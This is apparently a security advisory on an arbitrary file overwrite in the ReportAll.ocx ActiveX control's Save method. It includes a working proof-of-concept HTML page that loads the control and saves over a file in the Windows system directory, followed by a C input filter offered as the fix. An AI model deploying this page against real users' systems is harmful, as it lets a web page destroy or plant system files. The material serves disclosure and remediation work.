Brief description: The Save method of the ReportAll.ocx control does not filter the file name path, so an arbitrary file overwrite vulnerability exists.
Detailed Description: The Save method of the ReportAll.ocx control does not filter file name paths, so an arbitrary file overwrite vulnerability exists.
The following is a prototype of the Save method:
Sub Save(
    ByVal FileName As String
)
Proof of vulnerability:
<html>
<head>
<title>ReportAll ActiveX Control Arbitrary File Overwrite Vulnerability PoC</title>
</head>
<body>
<pre>
Name: ReportAll ActiveX Control Arbitrary File Overwrite Vulnerability
Vulnerability Type: Arbitrary File Overwrite
Time detected: 2010
Remote: Yes
Affected Software: ReportAll report development tool 2.0
Affected files: ReportAll.ocx 2.0.1.1656
Test environment: Windows XP SP3 + IE6
</pre>
<object classid="clsid:568DC60B-F884-4147-8610-8C348AAFA2F8" id="ReportAll"></object>
<script language="javascript">
function do_something()
{
    // The path is passed to Save() as-is; the control does not filter it.
    var arg1 = "c:\\windows\\NOTEPAD_.EXE";
    ReportAll.Document.Save(arg1);
}
</script>
<input type="button" language="javascript" onclick="do_something()" value="test...">
</body>
</html>
Solution: filter the FileName parameter of the Save method of the ReportAll.ocx control.
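One way such a filter could look, as an added example that is not the vendor's code: an allow-list check that accepts only a bare report file name and joins it to a directory the control chooses itself. The function names is_safe_save_name and build_save_path, the ".rpt" extension and the 64-character limit are assumptions made for illustration.

```c
/* Added example: allow-list filter for a Save(FileName)-style argument.
   Assumed policy (not from the vendor): bare file name only, extension
   ".rpt", written under a fixed directory chosen by the control. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive compare of the first n chars of s against upper-case ref. */
static int ieq_n(const char *s, const char *ref, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (toupper((unsigned char)s[i]) != ref[i]) return 0;
    return 1;
}

/* DOS device names (CON, NUL, COM1...) stay special even with an extension. */
static int is_device_name(const char *name) {
    size_t stem = strcspn(name, ".");
    if (stem == 3)
        return ieq_n(name, "CON", 3) || ieq_n(name, "PRN", 3) ||
               ieq_n(name, "AUX", 3) || ieq_n(name, "NUL", 3);
    if (stem == 4 && name[3] >= '1' && name[3] <= '9')
        return ieq_n(name, "COM", 3) || ieq_n(name, "LPT", 3);
    return 0;
}

/* Returns 1 only for a plain "<stem>.rpt" name with no path syntax. */
int is_safe_save_name(const char *name) {
    size_t len = name ? strlen(name) : 0;
    if (len < 5 || len > 64) return 0;            /* need a stem plus ".rpt" */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        /* letters, digits, '_', '-', '.' only: excludes \ / : and controls */
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.')) return 0;
    }
    if (name[0] == '.' || strstr(name, "..")) return 0;  /* no dot sequences */
    if (!ieq_n(name + len - 4, ".RPT", 4)) return 0;     /* extension allow-list */
    return !is_device_name(name);
}

/* Joins a validated name to the fixed base directory; returns 0 on success. */
int build_save_path(const char *base, const char *name, char *out, size_t outlen) {
    if (!is_safe_save_name(name)) return -1;
    int n = snprintf(out, outlen, "%s\\%s", base, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}
```

Because the caller never supplies a directory, the path from the proof of concept is rejected before any file is opened.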